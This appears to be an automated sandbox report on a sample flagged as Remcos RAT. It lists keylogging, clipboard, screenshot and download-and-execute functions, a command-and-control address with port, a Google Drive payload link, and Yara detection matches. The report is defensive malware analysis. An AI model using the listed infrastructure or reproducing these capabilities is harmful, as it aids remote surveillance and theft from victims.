Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_10541D28 FindFirstFileW (20_2_10541D28)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_105389CB getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose (20_2_105389CB)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_10535E90 _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread (20_2_10535E90)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_10534B5D FindFirstFileW (20_2_10534B5D)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_10543F1B FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose (20_2_10543F1B)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_1053631C FindFirstFileW,FindNextFileW,FindClose (20_2_1053631C)
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe; Code function: 29_2_00405B50 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA (29_2_00405B50)
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe; Code function: 29_2_02925CD4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA (29_2_02925CD4)
Contains functionality to query local drives
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00403B9A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?
$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch20_2_00403B9A

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe; Code function: 4x nop then mov eax, edi (29_2_043F9168)
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe; Code function: 4x nop then mov eax, edi (29_2_043F9166)
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe; Code function: 4x nop then test eax, 40000000h (29_2_043F8B48)
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe; Code function: 4x nop then or edx, 08h (29_2_043F8B48)

Networking:

Contains functionality to download and execute PE files
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe; Code function: 20_2_1053EC6F URLDownloadToFileW,ShellExecuteW,??3@YAXPAX@Z (20_2_1053EC6F)
Detected TCP or UDP traffic on non-standard ports
Source: global traffic; TCP traffic: 192.168.2.7:49711 -> 185.140.53.21:2404
Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Contains functionality to download additional files from the internet
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00402139 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,20_2_00402139
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: doc-14-8g-docs.googleusercontent.com
Urls found in memory or binary data
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1.crl0
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o10
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp | String found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmp | String found in binary or memory: https://doc-14-8g-docs.googleuse
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp | String found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmp | String found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/#
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp | String found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/1
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp, readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmp | String found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/docs/securesc/okjaf0d96k16o2ur6os401lotlk7qdd4/6nj4b82m
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmp | String found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/docs/secuu(
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmp | String found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/me
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp | String found in binary or memory: https://doc-14-8g-docs.googleusercontent.com/y
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp | String found in binary or memory: https://docs.google.com/
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp | String found in binary or memory: https://docs.google.com/nonceSigner?nonce=aihg3q2q9cv2s&continue=https://doc-14-8g-docs.googleuserco
Source: readme.exe, 00000000.00000002.667148640.00000000007A1000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/
Source: Htdrset.exe, 00000015.00000002.721028172.0000000004540000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/u/0/uc?id=1cz9sVIo7vuQlevGvVvv2eYYPIQVPcEnI&export=download
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/u/0/uc?id=1cz9sVIo7vuQlevGvVvv2eYYPIQVPcEnI&export=downloadq
Source: readme.exe, 00000000.00000002.667235056.00000000007E1000.00000004.00000020.sdmp | String found in binary or memory: https://pki.goog/repositorI
Source: readme.exe, 00000000.00000002.667055115.000000000076C000.00000004.00000020.sdmp, Htdrset.exe, 0000001D.00000003.717101409.0000000000674000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog/repository/0
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to capture and log keystrokes
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Esc] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Enter] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Tab] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Down] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Right] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Up] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Left] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [End] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [F2] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [F1] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Del] 20_2_00405DA6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Del] 20_2_00405DA6
Contains functionality to register a low level keyboard hook
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_10536A11 SetWindowsHookExA 0000000D,004051AE,00000000,00000000 | 20_2_10536A11
Contains functionality to read data from the clipboard
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@
std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai20_2_0040D1E8
Contains functionality to read the clipboard data
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040D1E8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@
std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai20_2_0040D1E8
Contains functionality to record screenshots
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0040F460 Sleep,CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,DeleteDC,DeleteDC,DeleteDC,DeleteObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,StretchBlt,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,GetCursorInfo,GetIconInfo,DeleteObject,DeleteObject,DrawIcon,GetObjectA,DeleteDC,DeleteDC,DeleteDC,DeleteObject,LocalAlloc,GlobalAlloc,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GetDIBits,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GlobalFree,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,20_2_0040F460
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\readme.exe | Code function: 0_2_00446CF0 GetKeyboardState,0_2_00446CF0
Potential key logger detected (key state polling based)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_00405221 GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,20_2_00405221

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match | File source: 00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 4880, type: MEMORY
Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 3944, type: MEMORY
Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 2272, type: MEMORY
Source: Yara match | File source: 34.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 34.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to change the wallpaper
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_00412EE3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,SystemParametersInfoW,20_2_00412EE3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_1054472B SystemParametersInfoW,20_2_1054472B

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000022.00000002.720967567.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000002.1021865759.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000014.00000002.1018532568.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.714674742.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.718308265.0000000010530000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
Source: 00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000022.00000002.717758224.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload Author: kevoreilly
